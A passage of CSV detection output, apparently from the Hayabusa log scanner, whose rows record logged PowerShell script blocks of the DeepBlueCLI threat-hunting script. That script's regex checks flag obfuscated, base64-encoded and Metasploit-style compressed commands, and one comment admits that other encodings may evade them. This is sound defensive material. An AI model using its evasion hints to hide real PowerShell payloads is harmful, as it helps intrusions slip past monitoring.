{$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . Main",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:11:27.669 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"$maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . Main",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:11:27.669 +00:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:11:27.672 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. $pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } ElseIf ($event.id -eq 4104){ # This section requires PowerShell command logging, which is not the default with # event 4104 (logs the script block but not the command that launched it). # # Add the following to \Windows\System32\WindowsPowerShell\v1.0\profile.ps1 # $LogCommandHealthEvent = $true # $LogCommandLifecycleEvent = $true # # See the following for more information: # # https://logrhythm.com/blog/powershell-command-line-logging/ # http://hackerhurricane.blogspot.com/2014/11/i-powershell-logging-what-everyone.html # # Thank you: @heinzarelli and @HackerHurricane # # The command's path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline. CLI parsing is *much* simpler than # script parsing. # This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Obfu $pscommand) $output += (Check-Command $pscommand 500 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Obfu $commandline) $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:11:27.682 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:11:27.684 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:11:41.504 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:11:41.506 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:11:41.506 +00:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:11:41.507 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:11:42.511 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:11:49.242 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.3.ps1 """" sysmon",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:11:49.249 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";ID=1,7} -ErrorAction Stop",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:11:52.107 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:12:04.061 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,.\DeepBlue-0.3.ps1,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:12:04.069 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"Get-WinEvent @{Logname=""Security"";ID=4688,4720,4728,4732,4625} -ErrorAction Stop",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:12:09.520 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:13:28.641 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,.\DeepBlue-0.3.ps1 ..\sysmon1.evtx sysmon,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:13:28.657 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"Get-WinEvent @{path=""..\sysmon1.evtx"";ID=1,7} -ErrorAction Stop",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:13:31.538 +00:00,SEC511,4104,info,,PwSh Scriptblock 